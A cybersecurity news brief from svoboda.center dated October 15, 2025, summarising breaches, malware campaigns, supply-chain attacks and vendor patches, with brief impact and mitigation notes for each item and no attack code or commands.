svoboda.center Logo svoboda.center

Svoboda Cybersecurity Brief October 15, 2025

Private VPN — just $1.2/mo

Discord and 5CA dispute source of government ID data breach

Discord blamed vendor 5CA for a breach exposing 70,000 government ID photos, but 5CA denied being hacked, claiming its systems remained secure. The dispute highlights challenges in third-party attribution during security incidents.
Source: DataBreaches.net

New York fines car insurers $14.2M for weak security after breaches

Eight car insurance companies fined $14.2M for failing to protect driver data, including 825,000 New Yorkers’ driver’s licenses and DOBs, exploited for fraudulent unemployment claims. Hackers abused “pre-fill” functions in online quote tools to harvest sensitive data.
Impact: Data exposed for fraud and identity theft.
Mitigation: Companies must enhance data security programs, implement MFA, and improve monitoring.
Source: DataBreaches.net

Malicious VSCode extensions steal crypto and code via OpenVSX

TigerJack group publishes malicious extensions (C++ Playground, HTTP Format) on OpenVSX, stealing source code and mining cryptocurrency. Extensions abuse Discord webhooks and execute arbitrary code via remote scripts.
Impact: Code theft, crypto mining, and backdoor access.
Mitigation: Verify extension publishers and monitor for unusual resource usage.
Source: BleepingComputer

Pixnapping Android flaw steals 2FA codes pixel-by-pixel

New side-channel attack (CVE-2025-48561) abuses GPU.zip and Android intents to steal 2FA codes, emails, and messages from apps like Google Authenticator. Works on fully patched Pixel and Samsung devices.
Impact: Unauthorized access to sensitive data without permissions.
Mitigation: Apply December 2025 Android patch; disable blur effects in developer settings.
Source: BleepingComputer

HyperBunker raises $925K for anti-ransomware hardware

Startup HyperBunker develops an immutable, air-gapped storage device to protect critical data from ransomware. Unlike backups, it prevents tampering via hardware isolation and encryption.
Source: SecurityWeek

Microsoft fixes 172 flaws, ends Windows 10 support

October Patch Tuesday addresses two zero-days: CVE-2025-24990 (Agere Modem driver) and CVE-2025-59230 (RasMan privilege escalation). Windows 10 reaches EOL, with ESU available for $30/year.
Impact: Active exploitation of unpatched systems.
Mitigation: Upgrade to Windows 11 or enroll in ESU.
Source: KrebsOnSecurity

RMPocalypse flaw breaks AMD SEV-SNP confidential computing

CVE-2025-0033 (CVSS 5.9) lets hypervisors corrupt RMP tables during initialization, compromising SEV-SNP memory integrity. Affects AMD EPYC 7003–9005 series.
Impact: Loss of VM isolation and data confidentiality.
Mitigation: Apply BIOS updates from OEMs; Azure ACC patches pending.
Source: The Hacker News

Chinese hackers abuse ArcGIS geo-mapping tool as backdoor

Flax Typhoon APT uses malicious ArcGIS Server Object Extensions (SOEs) for persistent access, deploying SoftEther VPN for lateral movement. Targets include IT workstations for credential theft.
Impact: Long-term espionage and network compromise.
Mitigation: Monitor ArcGIS SOE deployments; restrict admin access.
Source: The Hacker News

Oracle silently fixes EBS zero-day exploited by ShinyHunters

CVE-2025-61884 (SSRF) patched after being leaked by ShinyHunters. Clop ransomware also exploited CVE-2025-61882 for extortion. Confusion persists over exploit chains.
Impact: Unauthenticated access to sensitive data.
Mitigation: Patch immediately; block /configurator/UiServlet if delayed.
Source: BleepingComputer

npm, PyPI, and RubyGems packages exfiltrate data to Discord

Malicious packages (mysql-dumpdiscord, malinssx, sqlcommenter_rails) use Discord webhooks to steal env files, /etc/passwd, and system data. Contagious Interview campaign also floods npm with 338 fake packages.
Impact: Credential theft and supply chain compromise.
Mitigation: Audit third-party dependencies; monitor outbound Discord connections.
Source: The Hacker News

TA585 deploys MonsterV2 malware via phishing campaigns

TA585 uses IRS-themed lures and CAPTCHA overlays to deliver MonsterV2 RAT, which steals data and enables HVNC. Sold for $2,000/month on dark web.
Impact: Data exfiltration and remote control.
Mitigation: Train users on phishing; block suspicious PowerShell execution.
Source: The Hacker News

Secure Boot bypass in 200K Framework Linux laptops

Signed UEFI shells with memory modify (mm) command let attackers disable Secure Boot by overwriting gSecurity2 variable. Patches available for most models.
Impact: Bootkit persistence and OS compromise.
Mitigation: Apply firmware updates; restrict physical access.
Source: BleepingComputer

SAP patches critical flaws in NetWeaver and SRM

CVE-2025-42937 (directory traversal) and CVE-2025-42910 (file upload) fixed in SAP NetWeaver and SRM. No active exploits reported.
Impact: Arbitrary code execution and file manipulation.
Mitigation: Apply SAP Security Notes; restrict admin access.
Source: SecurityWeek

Harvard confirms Oracle EBS zero-day breach

First confirmed victim of Clop’s Oracle EBS campaign, with 1.3TB of data leaked. Attackers exploited unpatched vulnerabilities for financial and HR data theft.
Impact: Data breach of administrative systems.
Mitigation: Isolate EBS instances; audit access logs.
Source: SecurityWeek

Share this brief: https://svo.bz/qFNr

If you want to support us, you can donate here: Donate